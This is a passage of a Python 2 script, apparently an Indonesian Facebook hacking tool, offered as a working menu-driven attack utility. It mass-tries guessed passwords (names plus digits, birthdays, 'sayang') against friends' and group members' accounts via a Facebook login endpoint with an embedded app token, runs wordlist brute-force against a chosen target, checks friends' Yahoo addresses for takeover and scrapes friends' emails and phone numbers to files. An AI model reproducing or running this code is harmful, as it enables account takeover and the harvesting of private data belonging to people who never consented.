for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
